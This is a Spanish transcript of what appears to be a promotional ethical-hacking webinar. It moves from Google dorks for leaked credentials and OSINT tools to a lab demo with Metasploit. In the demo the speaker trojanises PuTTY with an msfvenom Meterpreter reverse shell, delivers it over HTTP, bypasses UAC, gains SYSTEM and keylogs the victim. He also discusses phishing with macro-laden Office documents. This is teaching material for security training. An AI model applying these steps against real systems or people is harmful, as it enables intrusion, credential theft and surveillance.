un dominio externo, pues irás primero a por eso, a por esa búsqueda, por ese dominio en sitios como este. También tenemos Google Docs, que se encuentran disponibles en ExploitDB. En ExploitDB o Exploit Database es una de las más grandes bases de datos de vulnerabilidades que se encuentran disponibles a día de hoy. Tiene de todo. Tiene vulnerabilidades en aplicaciones web comunes, vulnerabilidades en sistemas operativos como macOS, Linux, Windows, etcétera, ¿no? FreeBSD. Aquí podríamos filtrar también. Podríamos buscar, por ejemplo, vulnerabilidades para Apache. Bueno, Apache, la palabra Apache está relacionada con un montón de proyectos, ¿no? Con un montón de posibles de posible software, ¿no? Aquí podríamos ir filtrando, por ejemplo, una bastante reciente que afecta a sistemas Apache Tomcat, es de hace un par de meses, es de Apache Tomcat, el Ghostcat, que te permite leer cualquier fichero en el sistema operativo. Y bueno, aquí también tenemos lo que se conoce como Google Hacking Database, que está compuesto por dorks. Los dorks son simplemente palabras reservadas que se utilizan en Google para filtrar información. Por ejemplo, un dork podría ser este, y en este caso buscaría en todos los registros que tenga Google que el título ponga index of. Index of db MySQL Inc. ¿Vale? Aquí yo simplemente puedo poner esto en Google y con eso el Google Docs es este. Me puedo ir a google.com, poner esto y aquí me van apareciendo todos los que tienen, pues aquí por ejemplo, db MySQL Inc.
puede tener, en algunos casos, estos dominios pueden tener información de la base de datos. Por ejemplo, fijaros, includes, puede tener información sensible. Aquí, DB-MySQL Inc. Pues aquí aparece información sobre la conexión con la base de datos. Pueden aparecer datos sensibles, como por ejemplo la clave. ¿Vale? O sea, este tipo de información se puede sacar directamente utilizando Google Docs. Hay un montón. Aquí podríamos filtrar por ficheros que contienen contraseñas, ¿no? Y podríamos utilizar cualquiera de estos Google Docs. Hay herramientas que ya también automatizan esto. Por ejemplo, podría buscar algo como esto, password, console password, y lo busco en Google. Fijaros, son búsquedas sencillas que haces en Google, pero que tienen digamos, un significado especial. Esos son los Google Docs. Aquí, bueno, a ver, vamos a Jesse Debian. Aquí, por ejemplo, son fugas de información en dominios, ¿vale? Fugas que me pueden servir para elevar privilegios o para entrar en la aplicación o para ver cómo está montado este sistema. Por ejemplo, en este caso, puedo ver el firmware que tiene, aplicaciones que tiene este sistema instalado. Esta fuga de información en algunos casos nos puede ser útil como atacantes, este tipo de fugas, ¿no? Tenemos ExploitDB, tenemos Shodan, Harvester, Spiderfood. Todo esto nos permite recolectar información en fuentes abiertas. Luego, si por ejemplo queremos pasar a la acción, digamos, a la parte de explotación, perdón, tenemos la posibilidad de realizar ataques de ingeniería social, por ejemplo, por medio de técnicas de phishing. Podríamos intentar detectar vulnerabilidades en los servidores. Para ello utilizamos herramientas como, por ejemplo, Nmap. Podríamos listar puertos y servicios que se encuentran abiertos y ver pues, si esos servicios coinciden con algún tipo de vulnerabilidad explotable, ¿vale? En este caso, para que veáis una prueba, una muestra de cómo sería, vamos a abrir esto, un segundo, aquí. Bueno, voy a detener Spiderfoot, que todavía está en ejecución. Bueno, como podéis ver, va sacando un montón de información que luego podríamos ir analizando. Web Content, Description Abstract, HTTP Headers, Human Name, aquí he encontrado 3 por lo visto. Physical Locations, he encontrado 2. Información del certificado SSL. Bueno, aquí es simplemente cuestión de dejarlo correr, dejarlo que recolecte la mayor cantidad de información. Y si por lo que sea, como en este caso, necesitamos detener el escaneo, lo podemos hacer muy fácilmente. Aquí, New Scan, cuando pinchamos en New Scan, no, en Scans, perdón, aquí me aparece, está en ejecución, lo puedo detener. No significa que esto no significa que se vaya a detener de forma inmediata, simplemente le dices que luego que se detiene en este punto y luego se puede resumir, ¿no? Se puede reiniciar en el punto en el que se ha quedado, no hace falta volver a empezar desde el principio. Vale, pues en este caso lo voy a interrumpir y os voy a enseñar otra herramienta que ya es de explotación y que también es muy conocida, muy popular en el mundo de la explotación de software, que en este caso es Metasploit Framework. Aquí tengo Metasploit Framework. Una cosa, todas estas herramientas se encuentran disponibles en distribuciones como Kali Linux. Ahora mismo yo tengo en esta máquina un sistema Debian, no tengo Kali Linux, en este caso no me hace falta, lo tengo todo montado en esta partición, en Tools, Hacking. Bueno, aquí tengo las herramientas y no las he tenido que instalar, pero podéis hacerlo también directamente desde Kali, no tenéis que instalar nada, ¿vale? Aquí voy a cargar el RW Manager, ¿vale? Y puedo ejecutar herramientas como MSF Venom. ¿Qué es MSF Venom? Es una de las tantas utilidades que tiene Metasploit Framework. En esta charla pues no me da para explicaros en detalle las características de este framework, ya que es bastante potente. Sin embargo, sí que os voy a contar que, por ejemplo, MSF Venom es una utilidad que nos permite crear muestras de malware, un troyano, lo que viene a ser un troyano. ¿En qué consiste? Nos permite generar
un ejecutable para sistemas Linux, Windows o Mac, por ejemplo, y ese ejecutable se lo podemos mandar a la víctima por medio de correo electrónico en ataques de phishing o cualquier otra técnica que aplique ingeniería social, por ejemplo. Cuando la víctima ejecuta dicho ejecutable, valga la redundancia, cuando ejecuta dicho binario, nosotros obtenemos una conexión y partiendo de esa conexión podemos controlar su máquina de forma remota. Para eso sirve MSF. Entonces, en este caso vamos a hacer una prueba muy sencillita. Vamos a ver si lo tengo por aquí, si no lo descargo. No, creo que no lo tengo. No tengo el PuTTY. Voy a descargarme un PuTTY, ¿vale? Para los que no lo conozcáis, es una herramienta. Vamos a ver. Es una herramienta que se utiliza principalmente para conexiones a servidores FTP o SSH. Aquí está el cliente putty.exe, lo voy a descargar, ¿de acuerdo? Y vais a ver cómo funciona esto. Aceptar. Lo voy a guardar en el escritorio. Voy a generar una muestra de malware partiendo de este binario que es legítimo, ¿vale? De un binario, de un ejecutable que es legítimo, que el usuario puede fiarse de este binario, ¿no? Que cuando lo ejecuta, pues se va a comportar como normalmente lo hace. Entonces, primero, MSF Venom, el payload que voy a utilizar, que será x64 para arquitecturas de 64 bits, Meterpreter, que es el tipo de payload en Metasploit, uno muy popular, muy potente también, Reverse TCP, lhost. ¿Cuál va a ser el host al que quiero que se conecte? Pues mi máquina, 168.1.116. Lport. ¿Cuál va a ser el Lport? Pues en este caso el 4444, por ejemplo. -F, el formato. El formato va a ser un ejecutable para Windows. -O, voy a sacar este ficherito a Dastra, escritorio, lo voy a guardar aquí. Se va a llamar puttyvenom.exe. Vale, ejecutamos esto. Esperamos un momento. Vale, y aquí nos dice que perfecto, que se ha generado este binario. Podemos ver claramente que es un ejecutable para arquitecturas para plataformas Windows, arquitecturas de 64. Puedo transferir este binario a una máquina Windows, ¿no? Voy a dividir la pantalla, me voy a ir a donde lo he generado, que es aquí. Voy a levantar un servidor HTTP en el puerto 8080 para transferirlo a esa víctima, ¿no? La víctima es una máquina virtual que tengo aquí, que es un Windows 8. Ahora mismo se está ejecutando en el puerto 8080. Es un servidor web, lo que he levantado en mi máquina como atacante. Vale, vamos a ver. Puerto 8080. Bueno, aquí ya me cargó. A ver. Se llama Putty Venom. Lo voy a descargar. Bueno, aquí me ha generado el binario, ¿no? Aquí lo podéis ver. Sin embargo, los que habéis utilizado Putty, sabéis que este binario en concreto tiene un icono que es como este que vemos aquí. Es como de dos ordenadores o dos pantallas que están como interconectadas. En este caso, no se ve ese icono porque he generado la muestra sin la opción. A ver, aquí. Aquí. La he generado sin la plantilla, ¿no? Aquí simplemente he generado un ejecutable y lo he guardado aquí. Si yo quiero generar esto con una plantilla, lo hago con -X y -K. -K para mantener el comportamiento, para conservar el funcionamiento del PuTTY, y -X para indicar cuál es la plantilla, que en este caso es Astra escritorio putty.exe. Hago esto.
¿vale? Otra vez, he generado le he puesto el mismo nombre. Aquí me dice que todo muy bien, que es para Windows de 64. Y vale, las opciones son las que son. Es la dirección IP del atacante y el puerto 4444. Lo he puesto así. Puedo poner cualquier puerto y mientras tanto voy a abrir el MSF Console. Es una herramienta que también está disponible en Metasploit y en este caso es para recibir la conexión por parte de la víctima. Mientras que se está levantando, me voy al Windows 8 y ahora cuando recargue esto, voy a recargar el servidor web, recargo la página. A veces puede tardar. Aquí entro. Vale, ahora. Lo vuelvo a descargar. Y ahora fijaros, sí que me aparece con mostrar carpeta, con el icono, ¿no? Es este. Antes de ejecutarlo, necesito que en mi máquina local, en mi máquina como atacante, levantar pues, el handler correspondiente. Para ello utilizamos el módulo multi-handler de Metasploit. El payload, que es Windows x64 Meterpreter reverse TCP. Show options, aquí set lhost, esta IP, set lport, este puerto, que es el mismo, son los mismos detalles que he puesto cuando ejecutaba MSFB, ¿no? Y ahora show options. Ahora sí que me parece que todo muy bien. Están puestos los detalles. Le puedo dar a esto exploit. Y esperar a que la víctima simplemente dé doble clic en el binario. Cuando la víctima llegue y diga, bueno, pues aquí, MSFB, doble clic, que si lo quiere ejecutar, sí. Aquí aparece el PuTTY como esperaría y además, vamos a ver si ha funcionado. En la máquina del atacante vemos una sesión Meterpreter. Una sesión Meterpreter, de una forma muy amplia, muy genérica, es una sesión que me va a permitir controlar la máquina, la máquina comprometida. Aquí que puedo ver, por ejemplo, quién soy, ¿vale? Esto es una conexión directa contra la máquina comprometida. Ahora ya estoy dentro de esa máquina, la he explotado. Puedo ver comandos como, por ejemplo, timestamp para manipular ficheros. Puedo ver ficheros en la máquina comprometida, ¿no? Puedo volcar la base de datos SAM de usuarios y contraseñas del sistema Windows. Puedo intentar elevar privilegios con GetSystem. Puedo intentar controlar su ratón, su teclado. Puedo intentar iniciar un keyscan, que es simplemente un keylogger, ¿vale? Que se encarga de recolectar absolutamente toda la interacción que tiene el usuario con el sistema. Todo lo que la víctima digite en su sistema, lo voy a capturar, ¿vale? Iniciando simplemente este módulo. Sin embargo, esta sesión ahora mismo no tiene privilegios. Entonces, dentro de la metodología, una de las primeras cosas que tenemos que hacer es intentar elevar privilegios. ¿Cómo lo hacemos? Existen múltiples maneras, múltiples formas. En el caso de un sistema Windows 8, explotar el UAC, bueno, un sistema Windows 8, 7, en un sistema Windows 10, explotar el mecanismo de UAC, el WAC, es uno de los más habituales. Entonces, aquí podría hacer un use exploit local Windows local y aquí hay algunos cuantos módulos para hacer un bypass UAC, por ejemplo el de Event Viewer. Bypass UAC Event Viewer. Show options, me dice que el target en este caso es para x86, no me interesa ese target, me interesa el de 64. Show targets. En este caso es el 1, set target 1. Volvemos a ver opciones. Me parece el target correcto. Y la sesión se refiere a una sesión Meterpreter típicamente que ya haya conseguido previamente.
y ya la tengo. ¿Cómo lo sé? Sessions, aquí aparece pues, la conexión que tengo entre la víctima y esta máquina, mi máquina como atacante, la sesión 1. Puedo decir set sessions 1 y exploit. ¿Vale? Aquí me dice que command session, tengo otra shell, pero en este caso es del tipo command shell. Command shell sesión 2 opened, limpiando las claves del registro. Vamos, todo esto se ha hecho de forma automática, aprovechando, como podemos leer aquí, que el usuario de la sesión de Meterpreter que tenía anteriormente hace parte del grupo de administradores. Partiendo de eso, pues intenta, bueno, y el UAC está establecido a default, que es como vienen los sistemas Windows modernos, puede intentar hacer un bypass del UAC. Y partiendo de esto, pues ya tengo una command shell, ¿vale? Aquí tengo Windows System 32, ahora digamos que soy System, ¿vale? Podría hacer cualquier tipo de operación sobre este sistema, lo controlo. Puedo mandarlo, voy a mandar esta sesión a background, voy a hacer lo mismo, pero ahora voy a generar otra sesión llamada Meterpreter, bueno, del tipo Meterpreter, y voy a intentar controlar la interacción total de ese sistema. En este caso, pues tendré que poner nuevamente set payload, Meterpreter, reverse TCP, set lhost, mi IP y set lport, pues el puerto que yo quiera, el mismo. Exploit. Uy. Vale. Perfecto. Meterpreter sesión 3 opened. Y vais a ver cómo partiendo de esta sesión Meterpreter voy a poder capturar absolutamente todo lo que hace la víctima. Ahora mismo tengo esto. Puedo ejecutar el comando getSystem para directamente elevar privilegios. Y ahora sí, soy NT Authority System. ¿Qué puedo hacer? Un keyscan start. ¿Qué hace esto? Es un sniffer de las pulsaciones del teclado de la víctima. Si me voy aquí al Windows 8 y bueno, digamos que estoy navegando, la víctima está navegando en google.com, por poner un ejemplo. Todo lo que haga el usuario lo voy a estar registrando. Aquí pues busca cualquier cosa, pues qué sé yo, COVID-19, el tema de moda ahora mismo. Bueno, todo lo que vaya escribiendo por aquí, pues va a quedar registrado. Bueno, en cualquier parte del sistema. Si pincha aquí, escribe, por ejemplo, CMD, símbolo del sistema. Ya tenía una sesión abierta de esto. Vamos a ver. Lo que escriba yo aquí, todo lo que vaya escribiendo, todas las pulsaciones van quedando registradas en mi máquina como atacante. Vamos, que tengo control total sobre este sistema, lo podría apagar si quiero. Aquí puedo decir keyscan dump. Y aquí puedo ver absolutamente todo lo que el usuario ha ido digitando. Google.com, enter. COVID-19, enter. Ha hecho suprimir, ha escrito CMD, enter. La flecha de abajo ha escrito todo esto, luego ha hecho la tecla de retroceso, todo esto, ¿vale? Entonces, aquí yo puedo ir haciendo este tipo de operaciones. También podría analizar todo el tráfico de red. Hay un sniffer, hay una extensión que es Load Sniffer. Y tengo la posibilidad de capturar absolutamente todo el tráfico que esta máquina esté intercambiando con otras. Más cosillas que puedo hacer aquí. Le puedo, yo esto lo llamo el módulo del troleo, porque en realidad es algo así. Puedo inhabilitar su teclado y su ratón con el comando OICTL. Puedo habilitar o deshabilitar keyboard, mouse o todo. Puedo decir disable keyboard, ¿vale? Bueno, aquí vale, en este caso pues no me va a dejar, ya que no se está ejecutando sobre una máquina virtual y me dice que no, que para la máquina virtual en concreto no puedo hacerlo así. Vamos a hacerlo con all, voy a decir que no, ahora mismo no se puede.
Si fuese una máquina física no habría ningún problema, ¿vale? Em, Bien, aquí tengo control total. Este es otro de los pasos que tengo que llevar a cabo en la hora de explotar un sistema. Fijaros que todo va partiendo de recolección de información y demás, y luego intentamos explotar el sistema utilizando diferentes tipos de técnicas. Aquí he generado un ejecutable, un binario que puedo transmitir. Y que, bueno, partiendo de esto, tengo la posibilidad de realizar diferentes tipos de ataques. Ahora, un ejecutable no es la única vía de acceso. Podría generar, por ejemplo, un PDF, un documento en Word o en Excel que tenga internamente el payload que he lanzado antes. Es decir, esa muestra maliciosa se puede incluir directamente en un PDF, en un Excel, en un Word, y esto lo puedo mandar a una víctima. Esto es bastante habitual en técnicas de ingeniería social, en campañas de ingeniería social y de phishing. Si es un ataque dirigido, si es un ataque que está pensado a una persona o a una empresa concreta, digamos que el correo o la forma de delivery, de entrega, va a ser mucho más sofisticada. No se le va a mandar un exe normalmente. ¿Por qué motivo? Porque muchos correos, ¿no? Muchos servidores de correo lo van a filtrar. En su lugar, ¿qué mandaríamos? Directamente un documento en Excel o en PowerPoint o en Word, que sabemos que eso no lo va a filtrar el servidor de correo electrónico, normalmente no lo filtra. Y cuando el usuario lo reciba, cuando abra, ¿vale? Le va a aparecer una advertencia de que si quiere ejecutar macros o si quiere, dependiendo del tipo de ataque, o si quiere habilitar una característica que puede ser insegura, dependiendo de la versión de Office y también dependiendo de lo que incrustemos, si es una macro o si es un script del tipo Visual Basic Script o Visual Basic Application. Entonces, son diferentes alternativas que tenemos a la hora de explotar. Estas son las más utilizadas cuando eh, intentamos atacar la infraestructura humana, que es como se suele llamar a esto, cuando intentamos comprometer una máquina partiendo de una máquina que está al interior del perímetro, una máquina que hace parte de una red local, por ejemplo. Atacamos personal de esa empresa, partiendo de engaños y de técnicas de phishing. Evidentemente, la diferencia entre un ciberdelincuente y un hacker ético o un profesional de la ciberseguridad es que este tipo de técnicas solamente las va a aplicar dentro de un contexto legal, dentro de un contexto legítimo, con los permisos y con todo bastante controlado para no violar ningún tipo de ley o ningún tipo de derecho que puede ser tan fundamental, un derecho fundamental como la privacidad. Todo este tipo de cosas pues siempre se tienen en cuenta, ¿vale? Aquí solamente hemos visto, pues, no sé, un 1% de todo lo que veríamos en el máster, ¿no? Daros cuenta de que el número de horas es bastante considerable, son bastantes temas los que se van a tratar, y esto simplemente es una especie de abrebocas, ¿no? Es simplemente para que veáis algunas de las cosas que se pueden hacer en el mundo del pentesting y del hacking ético, de la ciberseguridad. Son solamente algunas pequeñas pinceladas de herramientas que son muy generales, herramientas que son muy conocidas en el mundo del pentesting y bueno, en principio el objetivo del máster va a ser ver todas estas herramientas en detalle y muchas más cosas. Aplicar diferentes técnicas de hacking, entender qué es lo que hacen por debajo para que luego esto no nos suene a chino. Cuando se esté hablando, por ejemplo, de Meterpreter, de Metasploit, de payloads, para que sepáis, es que un payload es esto, es que un exploit es esto otro, es que el módulo de Metasploit que hace un bypass UAC es por esto, es la idea, ¿no? Las clases que yo suelo dar no son precisamente, no tienen un contenido teórico muy pesado, son en, eh, en un 80% aproximadamente prácticas. A mí no me interesa que os sepáis perfectamente la teoría si no la podéis aplicar, especialmente en el mundo del pentesting. Si no podéis aplicarlo, pues es que simplemente no sirve. No sirve tener buenos conocimientos teóricos y luego no los podéis llevar a la práctica. Y la idea, evidentemente, es que sea un máster muy, muy práctico en todos los aspectos y que os sirva como una especie de experiencia previa para que luego cuando entréis a trabajar en,
en un perfil junior, por ejemplo, de ciberseguridad, pues tengáis ventaja sobre vuestros compañeros, de hecho, para que sepáis cosas que probablemente vuestros compañeros no van a saber y que os haga, digamos, sobresalir como profesionales en la ciberseguridad. Esa es la idea, ese es el objetivo del máster. Y bueno, en principio esto sería todo para este webinar.